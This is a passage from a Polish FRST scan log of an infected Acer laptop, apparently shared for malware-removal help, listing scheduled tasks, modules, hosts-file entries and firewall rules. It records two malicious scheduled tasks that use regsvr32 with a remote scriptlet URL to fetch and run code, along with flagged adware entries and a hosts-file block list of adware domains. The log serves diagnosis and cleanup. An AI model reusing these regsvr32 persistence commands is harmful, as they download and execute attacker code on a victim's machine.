[2018-01-05] (Adobe Systems, Incorporated) Task: {1ECDF658-3CB6-481B-B9A0-81DF76433CD5} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2017-11-08] (Piriform Ltd) Task: {1F18DACB-66F6-4C28-8C86-C3E4AD6A94F4} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.) Task: {1F2CD00D-DD13-4E37-A68F-6140BA8035F3} - System32\Tasks\FubToolByPLD => C:\OEM\Preload\FubTool\FubTool.exe [2015-05-14] () Task: {227BA77E-D230-43AB-AA57-7FB2D6D13A72} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.18022-0\MpCmdRun.exe [2018-03-01] (Microsoft Corporation) Task: {2B9A586C-B9F8-4266-A56A-CCAF8D4E58DB} - System32\Tasks\{F7F8C7F1-E077-477A-8FAC-F331E3DCB410} => "c:\windows\system32\launchwinapp.exe" hxxps://ui.skype.com/ui/0/7.40.0.104/pl/abandoninstall?page=tsProgressBar Task: {30580C63-46DA-427F-8463-36CC9BF43137} - System32\Tasks\ByteFence => C:\Program Files\ByteFence\ByteFence.exe [2017-07-20] (Byte Technologies LLC) <==== UWAGA Task: {34AF7115-C0B9-4B8F-9F11-4732C9DD40E2} - System32\Tasks\BacKGroundAgent => C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe [2016-08-30] (Acer Incorporated) Task: {35A27DA5-E12E-4F08-BB5E-989CBF7CA8BE} - System32\Tasks\DistromaticSearchProtect-hourly => C:\Program Files (x86)\Amazon Browser Settings\AmznSearchProtect.exe [2016-12-24] (Distromatic) <==== UWAGA Task: {365D2360-0F05-4F3B-BA45-A2196F64EAC8} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-03-13] (Microsoft Corporation) Task: {375E5DDE-2389-4CA4-AA68-40E4E1E56234} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-24] (Google Inc.) Task: {39B3156F-0315-42DF-81FD-15260C969B02} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2018-03-13] (Microsoft Corporation) Task: {40809622-C030-4237-A83F-E009F8D59139} - System32\Tasks\AdobeAAMUpdater-1.0-LAPTOP-5ILJ21CV-acer => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated) Task: {41252564-ECDA-4122-9EAD-F2961D8F8615} - System32\Tasks\ACCBackgroundApplication => C:\Program Files (x86)\Acer\Care Center\ACCStd.exe [2016-06-25] () Task: {698F1483-BEFE-4C9F-B337-7A6F5B164A36} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.18022-0\MpCmdRun.exe [2018-03-01] (Microsoft Corporation) Task: {69BAC9CF-27EC-45DF-A0EA-94A2F6656E0C} - System32\Tasks\AcerCMUpdateTask2.1.16258 => C:\Program Files (x86)\Acer\Amundsen\2.1.16258\AWC.exe [2016-09-20] () Task: {7507BF9D-0233-42DD-AEED-C799C2F0DE7A} - System32\Tasks\ACC => C:\Program Files (x86)\Acer\Care Center\LiveUpdateChecker.exe [2016-06-25] () Task: {793B33E4-4C67-4865-90F5-3B618C95B059} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3582310716-3901469781-3033083607-1001Core1d2b50a4c1cdd43 => C:\Users\witol\AppData\Local\Google\Update\GoogleUpdate.exe [2016-12-24] (Google Inc.) Task: {79BDFBAD-19FA-4857-9919-B66D0E59C550} - System32\Tasks\HPCustParticipation HP DeskJet 2130 series => C:\Program Files\HP\HP DeskJet 2130 series\Bin\HPCustPartic.exe [2017-04-18] (HP Inc.) Task: {8AFB56E0-2755-404B-8CAD-85B58DDBA934} - System32\Tasks\Software Update Application => C:\ProgramData\OEM\UpgradeTool\ListCheck.exe [2016-07-29] (Acer Incorporated) Task: {8BDF6B98-6E56-406F-BB6F-22A0E6692A31} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated) Task: {8C71E0BC-CC6C-476F-9DE1-D11D4C7F78B1} - System32\Tasks\{7A8611F4-67D2-4AB9-9A0D-01C8A52A83D3} => "c:\windows\system32\launchwinapp.exe" hxxps://ui.skype.com/ui/0/7.40.0.104/pl/abandoninstall?page=tsProgressBar Task: {90260738-EC91-4504-ADC6-0DBC696D23FA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.12.17007.18022-0\MpCmdRun.exe [2018-03-01] (Microsoft Corporation) Task: {9CAF206F-F7D4-47D7-9908-E52F04349CD6} - System32\Tasks\ByteFence Scan => C:\Program Files\ByteFence\ByteFence.exe [2017-07-20] (Byte Technologies LLC) <==== UWAGA Task: {A1E420F3-61B3-474F-BA2C-C24F2D7C334B} - System32\Tasks\Opera scheduled Autoupdate 1509392894 => C:\Users\acer.LAPTOP-5ILJ21CV\AppData\Local\Programs\Opera\launcher.exe [2017-09-26] (Opera Software) Task: {A2436501-5FAB-47BE-B8B6-5BE4367C200E} - System32\Tasks\ACCAgent => C:\Program Files (x86)\Acer\Care Center\LiveUpdateAgent.exe [2016-06-25] () Task: {A4392199-1D82-4760-B16D-27A477707206} - System32\Tasks\HPCustParticipation HP Deskjet 1510 series => C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPCustPartic.exe [2014-03-06] (Hewlett-Packard Co.) Task: {AA1AE94E-61C4-49B6-8E72-DEA2319D41EF} - System32\Tasks\{0D2DFFD9-42C9-4CC5-B5C3-7D5660EB393F} => "c:\windows\system32\launchwinapp.exe" hxxps://ui.skype.com/ui/0/7.40.0.104/pl/abandoninstall?page=tsProgressBar Task: {AA738E62-150E-4E49-AE10-784082A6FBF7} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3582310716-3901469781-3033083607-1001Core => C:\Users\witol\AppData\Local\Google\Update\GoogleUpdate.exe [2016-12-24] (Google Inc.) Task: {AB307EB0-31ED-42C5-AAD7-70E36F135119} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2018-03-17] (Microsoft Corporation) Task: {ACF69A8B-8E8F-4A1E-B277-E8ADCD50812D} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3582310716-3901469781-3033083607-1001UA1d2b50a4c42caa0 => C:\Users\witol\AppData\Local\Google\Update\GoogleUpdate.exe [2016-12-24] (Google Inc.) Task: {ADAD811E-ACA5-4F01-971B-529DBE8DC1FA} - System32\Tasks\Power Button => C:\Program Files\Acer\Acer Quick Access\ePowerButton_NB.exe [2016-07-29] (Acer Incorporated) Task: {ADBCF6DC-4882-4D93-911A-240A6F68054B} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-03-17] (Microsoft Corporation) Task: {B2C2BC0D-46D1-426E-A9C4-B81216A8ECF5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-12-24] (Google Inc.) Task: {B8945FFF-2F9A-4D46-A4C4-7C9DC31E9568} - System32\Tasks\PowerWord-SCT-JT => regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1WMWY8OYRYMdUdOWLXNjUyMTkdFjRLMWhYMkEcMWwcRH== scrobj.dll <==== UWAGA Task: {BDAC489D-6AF3-4742-9857-14F5D75350E8} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-11-08] (Piriform Ltd) Task: {C79034D2-9933-45F0-818F-A9DB4172EA6C} - System32\Tasks\Windows-WoShiBeiYongDe => regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1WMWY8OYRYMdUdOWLXNjUyMTkdFjRLMWhYMkEcMWwcRH== scrobj.dll <==== UWAGA Task: {CFE7A5C6-06BC-44B7-9C26-1A584005F60D} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2018-03-17] (Microsoft Corporation) Task: {D54F75F0-E945-45E7-8B9E-B63AEDDBF65D} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA Task: {D8387EB7-B874-4F52-9CA0-34321757E811} - System32\Tasks\{77B704AA-66BB-4F78-AA18-ED3B21518E73} => "c:\windows\system32\launchwinapp.exe" hxxps://ui.skype.com/ui/0/7.40.0.104/pl/abandoninstall?page=tsProgressBar Task: {DB0DA05C-3798-4EDE-A4B2-6926584912E8} - System32\Tasks\AcerCloud => C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe [2016-09-09] (Acer) Task: {DB5A679E-F921-410A-8611-3B556AB5C2DD} - System32\Tasks\DistromaticUpdater-logon => C:\Program Files (x86)\Amazon Browser Settings\updater.exe [2016-12-24] (Distromatic) <==== UWAGA Task: {DF0D8873-CE01-4B69-8D5F-735F0F1596A8} - System32\Tasks\DistromaticSearchProtect-logon => C:\Program Files (x86)\Amazon Browser Settings\AmznSearchProtect.exe [2016-12-24] (Distromatic) <==== UWAGA Task: {E7CE31AC-E513-4239-B705-C2D14616AB5C} - System32\Tasks\UbtFrameworkService => C:\Program Files\Acer\User Experience Improvement Program\Framework\TriggerFramework.exe [2014-03-13] (TODO: ) Task: {EAC6BC72-5B36-4C4A-9801-4354E7C241C2} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3582310716-3901469781-3033083607-1001UA => C:\Users\witol\AppData\Local\Google\Update\GoogleUpdate.exe [2016-12-24] (Google Inc.) Task: {EBC6FC6C-9F75-4389-A9FC-FF7047DC386F} - System32\Tasks\App Explorer => C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Local\Host App Service\Engine\HostAppServiceUpdater.exe [2018-03-02] (SweetLabs, Inc) <==== UWAGA (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty & WMI ======================== (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ShortcutWithArgument: C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\Postman.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=fhbjgbiflinjbdggehcddcbncdddomop ==================== Załadowane moduły (filtrowane) ============== 2017-09-29 15:41 - 2017-09-29 15:41 - 000184432 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll 2017-09-29 15:41 - 2017-09-29 15:41 - 000419840 _____ () c:\windows\system32\SSDM.dll 2016-11-17 02:28 - 2016-11-17 02:28 - 000092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll 2016-11-17 02:28 - 2016-11-17 02:28 - 001353528 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll 2018-02-22 15:26 - 2018-02-22 15:26 - 000105136 _____ () C:\Program Files (x86)\Amazon\Amazon Assistant\amazonAssistantService.exe 2018-02-22 15:28 - 2018-02-22 15:28 - 000159408 _____ () C:\Program Files (x86)\Amazon\Amazon Assistant\aaLoader64.dll 2015-05-19 18:11 - 2015-05-19 18:11 - 000007680 _____ () C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe 2017-08-14 23:43 - 2017-08-14 23:43 - 000900840 _____ () C:\Program Files (x86)\OpenVPN Technologies\PrivateTunnel\ovpnagent.exe 2017-02-16 16:20 - 2017-08-22 21:52 - 000302920 _____ () C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe 2017-02-10 14:11 - 2016-12-29 15:16 - 000134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2017-02-16 16:20 - 2017-08-22 21:52 - 000620872 _____ () C:\Program Files\ByteFence\rtop\bin\rtop_bg.exe 2017-09-25 01:01 - 2017-09-25 01:01 - 000400984 _____ () C:\WINDOWS\system32\igfxTray.exe 2017-09-26 03:52 - 2017-09-26 03:52 - 000491600 _____ () C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll 2018-03-14 11:29 - 2018-02-22 02:26 - 011044864 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 2018-03-14 11:29 - 2018-02-22 02:21 - 001804288 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2016-10-09 07:18 - 2015-05-14 09:10 - 000030976 _____ () C:\OEM\Preload\FubTool\FubTool.exe 2017-09-26 12:07 - 2017-09-26 12:07 - 000643200 _____ () C:\Program Files\OpenVPN\bin\openvpn-gui.exe 2016-10-09 05:55 - 2015-02-09 05:18 - 000124440 _____ () C:\Program Files\Realtek\Audio\HDA\FMAPP.exe 2017-02-14 14:32 - 2017-02-02 08:57 - 000073216 _____ () C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe 2016-06-25 03:54 - 2016-06-25 03:54 - 004644256 _____ () C:\Program Files (x86)\Acer\Care Center\ACCStd.exe 2017-09-26 03:52 - 2017-09-26 03:52 - 034879568 _____ () C:\Program Files (x86)\Adobe\Adobe Sync\Coresync\Coresync.exe 2018-03-21 11:26 - 2018-03-20 08:00 - 004435288 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\libglesv2.dll 2018-03-21 11:26 - 2018-03-20 08:00 - 000099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\libegl.dll 2018-03-24 17:28 - 2018-03-24 17:28 - 000086528 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.1811.248.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2018-03-24 17:28 - 2018-03-24 17:28 - 000195072 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.1811.248.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2018-03-24 17:28 - 2018-03-24 17:28 - 022050304 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.1811.248.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2018-03-24 17:28 - 2018-03-24 17:28 - 002584576 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.1811.248.0_x64__kzf8qxf38zg5c\skypert.dll 2018-03-24 17:28 - 2018-03-24 17:28 - 000657408 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.1811.248.0_x64__kzf8qxf38zg5c\RtmMvrUap.dll 2018-03-24 17:28 - 2018-03-24 17:28 - 000146432 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.1811.248.0_x64__kzf8qxf38zg5c\SkypeHost.Proxies.dll 2018-03-24 17:28 - 2018-03-24 17:28 - 000242176 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.1811.248.0_x64__kzf8qxf38zg5c\Microsoft.Skype.ImageTool.dll 2018-03-24 17:28 - 2018-03-24 17:28 - 000040960 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.1811.248.0_x64__kzf8qxf38zg5c\TraceProvider.dll 2018-02-28 09:22 - 2018-02-28 09:22 - 000629248 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.1811.248.0_x64__kzf8qxf38zg5c\RuntimeConfiguration.dll 2018-03-24 17:28 - 2018-03-24 17:28 - 000634880 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.1811.248.0_x64__kzf8qxf38zg5c\VideoN.dll 2016-10-09 06:22 - 2015-07-14 21:06 - 000011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll 2018-01-26 18:23 - 2018-01-08 18:52 - 001891832 _____ () C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Local\Discord\app-0.0.300\ffmpeg.dll 2018-01-26 18:23 - 2018-03-14 10:50 - 001780216 _____ () \\?\C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Roaming\discord\0.0.300\modules\discord_overlay2\discord_overlay2.node 2017-09-20 03:42 - 2017-09-20 03:42 - 067115616 _____ () C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\CEF\libcef.dll 2018-02-11 11:20 - 2018-02-11 11:20 - 001184256 _____ () C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Local\Facebook\Games\CefSharp.Core.dll 2018-02-14 00:30 - 2018-02-14 00:30 - 071641088 _____ () C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Local\Facebook\Games\libcef.dll 2017-08-17 11:47 - 2017-12-04 12:09 - 001452728 _____ () C:\Program Files (x86)\Microsoft Office\root\Office16\ClientTelemetry.dll 2017-08-23 22:05 - 2018-03-02 14:52 - 000294056 _____ () C:\Program Files (x86)\Microsoft Office\root\Office16\IEAWSDC.DLL 2016-08-15 19:03 - 2016-08-15 19:03 - 000202456 _____ () C:\Program Files (x86)\Acer\abPhoto\curllib.dll 2016-08-15 19:05 - 2016-08-15 19:05 - 000654000 _____ () C:\Program Files (x86)\Acer\abPhoto\sqlite3.dll 2016-08-15 19:05 - 2016-08-15 19:05 - 000641240 _____ () C:\Program Files (x86)\Acer\abPhoto\tag.dll 2016-08-15 19:04 - 2016-08-15 19:04 - 000119000 _____ () C:\Program Files (x86)\Acer\abPhoto\OpenLDAP.dll 2018-01-05 23:53 - 2018-01-05 23:53 - 000015064 _____ () C:\WINDOWS\assembly\GAC_MSIL\MyService\1.0.0.1__2dfa3f50f0bed57d\MyService.dll 2016-08-30 16:09 - 2016-08-30 16:09 - 000013016 _____ () C:\Program Files (x86)\Acer\AOP Framework\ServiceInterface.dll 2016-08-30 16:05 - 2016-08-30 16:05 - 000277856 _____ () C:\Program Files (x86)\Acer\AOP Framework\libcurl.dll 2018-01-26 18:23 - 2018-01-08 18:52 - 001937912 _____ () C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Local\Discord\app-0.0.300\libglesv2.dll 2018-01-26 18:23 - 2018-01-08 18:52 - 000095736 _____ () C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Local\Discord\app-0.0.300\libegl.dll 2018-02-17 15:29 - 2018-03-14 10:51 - 001910264 _____ () \\?\C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Roaming\discord\0.0.300\modules\discord_spellcheck\node_modules\cld\build\Release\cld.node 2018-02-17 15:29 - 2018-03-14 10:51 - 000422392 _____ () \\?\C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Roaming\discord\0.0.300\modules\discord_spellcheck\node_modules\spellchecker\build\Release\spellchecker.node 2018-02-17 15:29 - 2018-03-14 10:51 - 000145400 _____ () \\?\C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Roaming\discord\0.0.300\modules\discord_spellcheck\node_modules\keyboard-layout\build\Release\keyboard-layout-manager.node 2018-01-26 18:23 - 2018-03-26 22:17 - 009623896 _____ () \\?\C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Roaming\discord\0.0.300\modules\discord_voice\discord_voice.node 2018-01-26 18:23 - 2018-03-14 10:50 - 001508344 _____ () \\?\C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Roaming\discord\0.0.300\modules\discord_utils\discord_utils.node 2018-01-26 18:23 - 2018-03-14 10:49 - 000513016 _____ () \\?\C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Roaming\discord\0.0.300\modules\discord_erlpack\discord_erlpack.node 2018-01-26 18:23 - 2018-03-14 10:50 - 001517560 _____ () \\?\C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Roaming\discord\0.0.300\modules\discord_game_utils\discord_game_utils.node 2018-01-26 18:23 - 2018-03-14 10:49 - 002662904 _____ () \\?\C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Roaming\discord\0.0.300\modules\discord_rpc\discord_rpc.node 2018-01-26 18:25 - 2018-03-14 10:51 - 002749944 _____ () \\?\C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Roaming\discord\0.0.300\modules\discord_contact_import\discord_contact_import.node 2018-02-11 11:20 - 2018-02-11 11:20 - 000774656 _____ () C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Local\Facebook\Games\CefSharp.BrowserSubprocess.Core.dll 2018-02-11 11:20 - 2018-02-11 11:20 - 003149824 _____ () C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Local\Facebook\Games\libglesv2.dll 2018-02-11 11:20 - 2018-02-11 11:20 - 000078848 _____ () C:\Users\acer.LAPTOP-5ILJ21CV.000\AppData\Local\Facebook\Games\libegl.dll 2015-06-24 10:07 - 2015-06-24 10:07 - 001243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll 2017-09-06 19:11 - 2017-09-06 19:11 - 000118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\fs-ext\build\Release\fs-ext.node 2017-09-06 19:11 - 2017-09-06 19:11 - 000214528 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node 2017-09-06 19:11 - 2017-09-06 19:11 - 000117248 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ref\build\Release\binding.node 2017-09-06 19:11 - 2017-09-06 19:11 - 000125952 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ffi\build\Release\ffi_bindings.node 2017-09-20 04:04 - 2017-09-20 04:04 - 000099424 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll 2017-09-06 19:11 - 2017-09-06 19:11 - 000086528 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\idle-gc\build\Release\idle-gc.node ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: ========================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2015-10-30 09:24 - 2018-03-26 23:39 - 000006988 _____ C:\WINDOWS\system32\Drivers\etc\hosts 0.0.0.0 0.0.0.0 # fix for traceroute and netstat display anomaly 0.0.0.0 tracking.opencandy.com.s3.amazonaws.com 0.0.0.0 media.opencandy.com 0.0.0.0 cdn.opencandy.com 0.0.0.0 tracking.opencandy.com 0.0.0.0 api.opencandy.com 0.0.0.0 api.recommendedsw.com 0.0.0.0 rp.yefeneri2.com 0.0.0.0 os.yefeneri2.com 0.0.0.0 os2.yefeneri2.com 0.0.0.0 installer.betterinstaller.com 0.0.0.0 installer.filebulldog.com 0.0.0.0 d3oxtn1x3b8d7i.cloudfront.net 0.0.0.0 inno.bisrv.com 0.0.0.0 nsis.bisrv.com 0.0.0.0 cdn.file2desktop.com 0.0.0.0 cdn.goateastcach.us 0.0.0.0 cdn.guttastatdk.us 0.0.0.0 cdn.inskinmedia.com 0.0.0.0 cdn.insta.oibundles2.com 0.0.0.0 cdn.insta.playbryte.com 0.0.0.0 cdn.llogetfastcach.us 0.0.0.0 cdn.montiera.com 0.0.0.0 cdn.msdwnld.com 0.0.0.0 cdn.mypcbackup.com 0.0.0.0 cdn.ppdownload.com 0.0.0.0 cdn.riceateastcach.us 0.0.0.0 cdn.shyapotato.us 0.0.0.0 cdn.solimba.com 0.0.0.0 cdn.tuto4pc.com ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-3582310716-3901469781-3033083607-1008\Control Panel\Desktop\\Wallpaper -> C:\WINDOWS\web\wallpaper\Windows\img0.jpg DNS Servers: 192.168.0.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{C2652E60-4C25-4BE7-87D2-B78A4C55A1C7}] => (Allow) C:\Program Files\HP\HP DeskJet 2130 series\Bin\HPNetworkCommunicatorCom.exe FirewallRules: [{7F61FE97-12DB-4EE1-8B41-41142CCE2870}] => (Allow) C:\Program Files\HP\HP DeskJet 2130 series\Bin\USBSetup.exe FirewallRules: [{DEBCCFEF-A325-4685-B1C6-A8760BBFEF7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{DFC3BFBD-712C-4C9A-AE59-485CD033A81D}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{F3D8B095-8420-4371-B1D2-BEB3C7974620}] => (Allow) C:\Users\acer.LAPTOP-5ILJ21CV\AppData\Local\Programs\Opera\48.0.2685.32\opera.exe FirewallRules: [UDP Query User{25F63127-F6DF-4A6E-82CC-456ADF3DEEE1}C:\program files\java\jre1.8.0_111\bin\java.exe] => (Block) C:\program files\java\jre1.8.0_111\bin\java.exe FirewallRules: [TCP Query User{327783C2-2E65-40DD-896D-16A94D7D0691}C:\program files\java\jre1.8.0_111\bin\java.exe] => (Block) C:\program files\java\jre1.8.0_111\bin\java.exe FirewallRules: [{B102B978-2674-4E2E-AE49-41C31DD546A2}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe FirewallRules: [UDP Query User{BC497277-6660-4737-AC5E-2B2466944A9D}C:\program files\counter-strike global offensive\csgo.exe] => (Allow) C:\program files\counter-strike global offensive\csgo.exe FirewallRules: [TCP Query User{9488DAB7-8C12-4468-A900-64538A65893B}C:\program files\counter-strike global offensive\csgo.exe] => (Allow) C:\program files\counter-strike global offensive\csgo.exe FirewallRules: [{467AFFBB-A99E-4E3E-930F-5B1C2942A2FE}] => (Allow) C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPNetworkCommunicatorCom.exe FirewallRules: [{9981EF46-8CD0-481D-9E2B-51B5E3365804}] => (Allow) C:\Program Files\HP\HP Deskjet 1510 series\Bin\USBSetup.exe FirewallRules: [UDP Query User{DBA9C2D1-9B27-4345-A23A-DBF59FEB2717}C:\program files\java\jre1.8.0_111\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_111\bin\javaw.exe FirewallRules: [TCP Query User{6B42BE58-DA2F-471D-9191-02140F3AC3BD}C:\program files\java\jre1.8.0_111\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_111\bin\javaw.exe FirewallRules: [{F558B950-FC5D-42D7-80CA-72AB9EA464B2}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe FirewallRules: [{AF12C522-4796-4FC5-9A02-DBE42EEFCCE4}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe FirewallRules: [{1C68FC43-6394-404D-85B4-C8101C13FD8E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe FirewallRules: [{0BCDBE62-4B43-43DD-A1A3-0CD19CA3F7D9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{C85B1983-B67C-496C-8AC4-25EA5F13CE79}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{7AA01932-6DB4-45CB-AC32-1A2AFB98C8A9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{9686E643-9783-4ACB-884C-3CA7090C071B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{AAA013BF-BC0B-4B7F-B1CE-004E76122494}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12.exe FirewallRules: [{11E6DC78-CE05-4276-AAA9-BE9FF76AC795}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\PowerDVD12ML.exe FirewallRules: [{0E665CE9-F082-47A4-B0AA-288BE8163CE1}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD.exe FirewallRules: [{3700FA73-FBE9-4303-B837-1EDC65F146C1}] => (Allow) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe FirewallRules: 